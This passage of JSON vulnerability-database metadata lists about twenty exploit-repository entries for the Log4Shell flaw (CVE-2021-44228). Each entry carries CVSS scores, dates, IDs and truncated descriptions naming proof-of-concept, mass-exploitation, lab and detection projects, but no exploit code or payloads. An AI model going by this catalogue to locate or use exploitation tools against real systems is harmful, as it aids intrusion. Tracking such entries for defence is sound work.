"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-08T00:28:45", "id": "7948E878-9BFE-5FEB-90AE-14C32290452F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-19T03:10:18", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T14:51:26", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T18:03:52", "id": "5B342AC3-2399-581E-BB6A-2EF19BC35B0C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-27T23:56:09", "description": "# CVE-2021-44228-Mass-RCE\nCVE-2021-44228 Mass Exploitation tool ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T22:19:29", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-27T20:57:52", "id": "CBEB0168-C1C9-5A9B-8B92-83E1054E44EA", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-19T06:17:49", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T16:08:47", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-08-06T04:11:07", "id": "CBCB527D-3C29-5E5B-8C71-D7F20AB001D0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-11-02T09:13:35", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T15:42:06", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-04T14:01:16", "id": "6600C311-30E5-566D-98F1-AC47E752EBEA", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T17:04:30", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T09:15:47", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-07-13T15:16:41", "id": "57742B88-2AA6-5788-825F-92A73CA85718", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-17T21:27:35", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T08:13:35", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-21T08:15:05", "id": "0D6ADE4E-8BA2-5BA9-94CB-ED90234A9B5C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-02-08T18:21:15", "description": "# Log4JPOC\nPOC for CVE-2021-44228 vulnerabilit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T15:15:12", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-24T10:15:11", "id": "AF45C6B5-246A-5363-8436-954018BD121C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-20T11:07:41", "description": "# POC for CVE-2021-44228\n\nThis python script was created while I...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T10:40:32", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T10:40:47", "id": "F2F2719B-7041-5D1A-A95A-7617360B1D08", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-02-08T18:22:43", "description": "# log4j-detect\n\n<h4 align=\"center\">Simple Python 3 script to det...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T08:48:59", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T12:17:01", "id": "FB593988-2CFC-5828-8229-9274AC7B0F86", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-17T04:45:11", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T01:08:00", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-07-03T16:27:04", "id": "CB9B5FAA-47CA-5D85-91B9-0AC5179D527B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-27T08:27:38", "description": "# Log4Shell sample vulnerable application (CVE-2021-44228)\n\nThis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-27T07:07:30", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-27T07:10:06", "id": "926942FE-1507-5B71-9266-0A5EDC38EE50", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-22T09:04:41", "description": "## Log4J_Exploitation-Vulnerabiliy__CVE-2021-44228.\n\n![Untitled]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T11:29:57", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-08T00:28:45", "id": "FE8572DF-42D4-521C-B3DC-4715C2F9240D", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-13T05:33:31", "description": "## Overview\nThis guide shows how to setup Git in your machine an...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T01:53:17", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-13T03:11:56", "id": "6F251270-3935-58F4-835C-C9D26FA97CD6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T00:25:36", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T18:51:07", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-01T14:37:49", "id": "29A41C2D-FF26-591A-A88B-DDB396742BBC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-09T20:21:06", "description": "# CVE-2021-44228-Advisories\nPlease open Issues to include an adv...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T12:41:38", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-09T20:08:19", "id": "129B39DD-AB9E-54F0-B6B4-5EA17F29B7DF", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-21T05:08:10", "description": "# Log4j Vulnerability - Proof-of-concept\n\nThis repo has the dock...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T19:50:40", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-21T02:11:16", "id": "6F93E170-75AD-5F5C-B7CC-6C4CEAA695AB", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:28:02", "description": "# Log4Shell docker lab for CVE-2021-44228\n\n## The components\nThi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-18T19:30:35", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-05T14:55:14", "id": "B32ED3B3-2054-5776-B952-907BE2CBEED6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:21:02", "description": "# CVE-2021-44228(Apache Log4j Remote Code Execution\uff09\n\n> [all log...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-09T13:38:38", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-30T06:01:01", "id": "0B596CD2-49C7-50A8-A43C-8DE3027EC2B7", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:21:18", "description": "# Log4jHorizon\n\nExploiting CVE-2021-44228 in VMWare Horizon for ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-05T22:25:42", "type": "githubexploit", "title": "Exploit for Uncontrolled Resource Consumption in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-24T12:10:14", "id": "EA906824-9149-507D-893C-87A7FED8998B", "href": "", "cvss": {"score": 9.3, "vector": 